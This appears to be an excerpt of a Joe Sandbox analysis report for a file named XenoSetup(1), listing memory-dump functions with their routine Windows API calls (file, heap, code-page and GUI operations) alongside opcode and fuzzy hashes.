Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 32767769a4262987aef03ce85fdcc4f5ffc69f15291d78889a7c9bcfd3495f61
Instruction ID: 8a7b34139b75dff19ff79819f764409c5f2eddf1ce4892e55c38bb7718c19528
Opcode Fuzzy Hash: 32767769a4262987aef03ce85fdcc4f5ffc69f15291d78889a7c9bcfd3495f61
Instruction Fuzzy Hash: 5CE05530780318BBE212BB26CC06D6EBB95EF54720F0100A9FD829F240CD7D4A0183C4

Function 0100BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0100B7BB: GetOEMCP.KERNEL32(00000000,?,?,0100BA44,?), ref: 0100B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0100BA89,?,00000000), ref: 0100BC64
GetCPInfo.KERNEL32(00000000,0100BA89,?,?,?,0100BA89,?,00000000), ref: 0100BC77

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: c94e881a09b77559eec9d39bce88058bea74e3114e1d9ba06d67f6b30f173fee
Instruction ID: 77cdc278f7ff55d4afe66a6af4dd466101cd861f7885d4a2d2a690e9a6681565
Opcode Fuzzy Hash: c94e881a09b77559eec9d39bce88058bea74e3114e1d9ba06d67f6b30f173fee
Instruction Fuzzy Hash: DA5137789002499EF7229F39C480AFAFBE5EF41210F1844AED5D68B2D1EB399545CB91

Function 00FE9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00FE9A50,?,?,00000000,?,?,00FE8CBC,?), ref: 00FE9BAB
GetLastError.KERNEL32(?,00000000,00FE8411,-00009570,00000000,000007F3), ref: 00FE9BB6

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: be5fa076aba0a8252ffc9c171b39bbac3f88e548bcfb1b8b207eaff1ec24b566
Instruction ID: d523f62341e4bd9e628c7dbfacdb94a05325220aa686ffe61171eff1569b54fb
Opcode Fuzzy Hash: be5fa076aba0a8252ffc9c171b39bbac3f88e548bcfb1b8b207eaff1ec24b566
Instruction Fuzzy Hash: 1D41DF31A08381CFDB24DF16E58456AB7E6FFD4720F148A2DE89183261D7F4AE44AB71

Function 0100BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 010097E5: GetLastError.KERNEL32(?,01021030,01004674,01021030,?,?,01003F73,00000050,?,01021030,00000200), ref: 010097E9
Part of subcall function 010097E5: _free.LIBCMT ref: 0100981C
Part of subcall function 010097E5: SetLastError.KERNEL32(00000000,?,01021030,00000200), ref: 0100985D
Part of subcall function 010097E5: _abort.LIBCMT ref: 01009863

Part of subcall function 0100BB4E: _abort.LIBCMT ref: 0100BB80
Part of subcall function 0100BB4E: _free.LIBCMT ref: 0100BBB4

Part of subcall function 0100B7BB: GetOEMCP.KERNEL32(00000000,?,?,0100BA44,?), ref: 0100B7E6

_free.LIBCMT ref: 0100BA9F
_free.LIBCMT ref: 0100BAD5

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 755762f0d96872171d3ca873661471accb4afadff4c772cf2ee88559365b28fa
Instruction ID: 0afcf61fcfdc810ec2f3c0b29c15f4e3d85dacf29dbec09b0454d379745a57fc
Opcode Fuzzy Hash: 755762f0d96872171d3ca873661471accb4afadff4c772cf2ee88559365b28fa
Instruction Fuzzy Hash: 3231B63590420AAFFB13EFA8D440BAD7BF5EF41325F25409AD9849B2D2EB765D80CB50

Function 00FE1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE1E55

Part of subcall function 00FE3BBA: __EH_prolog.LIBCMT ref: 00FE3BBF

_wcslen.LIBCMT ref: 00FE1EFD

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: e7456fb09f10007c8ce2afdb7f02f20cb0a88635baa3e427b2a7042be96a318e
Instruction ID: 0a81fecfce278a8a224b87d11e9a7cafea89916becb5b5f7e37c6b9c75b43d56
Opcode Fuzzy Hash: e7456fb09f10007c8ce2afdb7f02f20cb0a88635baa3e427b2a7042be96a318e
Instruction Fuzzy Hash: 0E314B71D042899FCF11DF9AC945AEEBBF6BF58310F100069F485A7291C7365E10EB60

Function 00FE9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FE73BC,?,?,?,00000000), ref: 00FE9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00FE9E70

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 44c1a59713be9a8f793a43d1074c62622b8407bb5e6a4aaac3241ce3b1e57d79
Instruction ID: 6da6c618382f4469f93a9f05bd69ac5dc48d433ffc2297af5e1bd50aeac8ad58
Opcode Fuzzy Hash: 44c1a59713be9a8f793a43d1074c62622b8407bb5e6a4aaac3241ce3b1e57d79
Instruction Fuzzy Hash: 3921F03264C295EBC724CE36C891AABBBE4AF91314F08491CF4C587141D369E90DAB72

Function 00FE966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00FE9F27,?,?,00FE771A), ref: 00FE96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00FE9F27,?,?,00FE771A), ref: 00FE9716

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fe5cbfaabf662cf417e2138f0c1df1ad2604d18324610991182b50f6a63035f7
Instruction ID: f21144affdea23e78232a3e5f6805901024ff4ed4376c9aeb1417c827e899092
Opcode Fuzzy Hash: fe5cbfaabf662cf417e2138f0c1df1ad2604d18324610991182b50f6a63035f7
Instruction Fuzzy Hash: 052190715083846EE3309A66CC89BB777DCEB49334F100A1AFAD5C65D1C7B8A884A671

Function 00FE9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00FE9EC7
GetLastError.KERNEL32 ref: 00FE9ED4

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: a92f919bdc9d434f5aa26a0631addd5c80ecb69f8f223fe1919c9fda505bb8b8
Instruction ID: f52e73effb44ac0ef0e78d1d6bcdebad5490e46927e5730541cd9507551b3207
Opcode Fuzzy Hash: a92f919bdc9d434f5aa26a0631addd5c80ecb69f8f223fe1919c9fda505bb8b8
Instruction Fuzzy Hash: 0611E531A04784ABD734C62ACC80BA6B7E9AB44370F504A29F652D26D0D7F4ED45E770

Function 01008E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01008E75

Part of subcall function 01008E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0100CA2C,00000000,?,01006CBE,?,00000008,?,010091E0,?,?,?), ref: 01008E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,01021098,00FE17CE,?,?,00000007,?,?,?,00FE13D6,?,00000000), ref: 01008EB1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: c2592ec2b84f2662fdddc56b9a9effbf502ac4ad1ac08c85b550082b2243dfea
Instruction ID: b4af60604834dc3c8f8029842b2ba0d1e9c97ca66f3f8d4ec68aedf193bc9d39
Opcode Fuzzy Hash: c2592ec2b84f2662fdddc56b9a9effbf502ac4ad1ac08c85b550082b2243dfea
Instruction Fuzzy Hash: B6F0C832E01146A6FB232A295C04BAF3B98BF91770F14C157E9D8661D0DF759D0081A1

Function 00FF109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00FF10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00FF10B2

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 128d576bd65740929a7a0b54440720979554ce0c20401e01d07bcfdca372c818
Instruction ID: bffc923e2a90b0197de6462bce6775fdf86c24700d3037d5698272a8dcc7a4aa
Opcode Fuzzy Hash: 128d576bd65740929a7a0b54440720979554ce0c20401e01d07bcfdca372c818
Instruction Fuzzy Hash: 46E09A32F0024DE7CF2E8AA498159BB72EDFE442643208179E603E7101FD38ED415BA0

Function 00FEA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA501

Part of subcall function 00FEBB03: _wcslen.LIBCMT ref: 00FEBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA532

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 684d5a7489baa49e1f02a5b26ee8d4e21ed82580d485384aa20f434a012cae5c
Instruction ID: 51d9412ed991e4d1c79b4a78d1a21c61624fbe16ec64dfe8d6333c1bc05faab6
Opcode Fuzzy Hash: 684d5a7489baa49e1f02a5b26ee8d4e21ed82580d485384aa20f434a012cae5c
Instruction Fuzzy Hash: 6EF0E531200249BBDF025F61DC01FDA3BADBF04395F488050B944D5164DB35DAD8EF10

Function 00FEA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00FE977F,?,?,00FE95CF,?,?,?,?,?,01012641,000000FF), ref: 00FEA1F1

Part of subcall function 00FEBB03: _wcslen.LIBCMT ref: 00FEBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FE977F,?,?,00FE95CF,?,?,?,?,?,01012641), ref: 00FEA21F

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 441f005cd11807d47a94ae2a37b1faaea46eb4378e9907d3bd6b0b0e850be027
Instruction ID: 387de9731dcd065ef34fb3d0c4a7d6e5fee88a433c1f58df3a3dc88dcfa7145e
Opcode Fuzzy Hash: 441f005cd11807d47a94ae2a37b1faaea46eb4378e9907d3bd6b0b0e850be027
Instruction Fuzzy Hash: 9FE0D8315402496BDB115F61DC45FEA379CBF0C7D1F484021BA44E6054EB7ADEC4EB60

Function 00FFAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,01012641,000000FF), ref: 00FFACB0
CoUninitialize.COMBASE(?,?,?,?,01012641,000000FF), ref: 00FFACB5

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: e168ce4cfe0fc49dcc6ff0648601cd0e1df3b457d713669e710174deeb2dc7ea
Instruction ID: c64e1c2fcdb53343139da5a4038b0d124f58c8ce53aaa8fa61fc1e858a858cb2
Opcode Fuzzy Hash: e168ce4cfe0fc49dcc6ff0648601cd0e1df3b457d713669e710174deeb2dc7ea
Instruction Fuzzy Hash: A8E06576604650EFC710AF59DC46B45FBA8FB88A20F10426AF456D3764CB786800CB90

Function 00FEA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00FEA23A,?,00FE755C,?,?,?,?), ref: 00FEA254

Part of subcall function 00FEBB03: _wcslen.LIBCMT ref: 00FEBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00FEA23A,?,00FE755C,?,?,?,?), ref: 00FEA280

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: b5afb64fbb51d4916d8465558fe179b4bc981e2c22df7e99df374e9c8a70f214
Instruction ID: ec47d14167ba6e07f9aa3e2143abd9a47bab1ae7072633eb5fc37e02480e850b
Opcode Fuzzy Hash: b5afb64fbb51d4916d8465558fe179b4bc981e2c22df7e99df374e9c8a70f214
Instruction Fuzzy Hash: 2EE092319001689BCF21AB64CC05BD97798AB083F1F0442A1FE84E7194D779DD44DBA0

Function 00FFDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00FFDEEC

Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5

SetDlgItemTextW.USER32(00000065,?), ref: 00FFDF03

Part of subcall function 00FFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FFB579
Part of subcall function 00FFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFB58A
Part of subcall function 00FFB568: IsDialogMessageW.USER32(00090028,?), ref: 00FFB59E
Part of subcall function 00FFB568: TranslateMessage.USER32(?), ref: 00FFB5AC
Part of subcall function 00FFB568: DispatchMessageW.USER32(?), ref: 00FFB5B6

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 95b90e7bf5a97d7a737bfe9b3869085122c34b9289b7f28831bf1d3fdc99390f
Instruction ID: 04dce551dc37dbe2611ce4a05b34bd1e6bf1f71a02fa95ff02ed3f762cf8dab1
Opcode Fuzzy Hash: 95b90e7bf5a97d7a737bfe9b3869085122c34b9289b7f28831bf1d3fdc99390f
Instruction Fuzzy Hash: 2EE092B640038827DF22AB61DC06FAE3BAC5B15785F484856B344EA0B2DA7DEA109761

Function 00FF081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FF0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FEF2D8,Crypt32.dll,00000000,00FEF35C,?,?,00FEF33E,?,?,?), ref: 00FF0858

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 100288232c12ee5c19b240b83a77303f2423ef1d0792f2d0922588d6b45e91a2
Instruction ID: 65bc6dfa093d0c3db9e2fbf312c6b03395bab93751300c5f13d236c7059c6715
Opcode Fuzzy Hash: 100288232c12ee5c19b240b83a77303f2423ef1d0792f2d0922588d6b45e91a2
Instruction Fuzzy Hash: D4E012768002586ADB11A6959D05FEA7BACFF097E1F0400657645E2004DA78DA84DBA0

Function 00FFA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FFA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00FFA3E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 421956c65453b944f906e4bb330294c6e5b41799bb90a8f01259e008a929a2f2
Instruction ID: 8621e1700258584b9e1af2d68236ee73a5e13d5eefac2286b72788bb6011accd
Opcode Fuzzy Hash: 421956c65453b944f906e4bb330294c6e5b41799bb90a8f01259e008a929a2f2
Instruction Fuzzy Hash: C3E0EDB190021CEBCB10DF55C9417A9BBE8EF04364F10805AA98A93221E378AE04EB91

Function 01002B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01002BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01002BB5

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

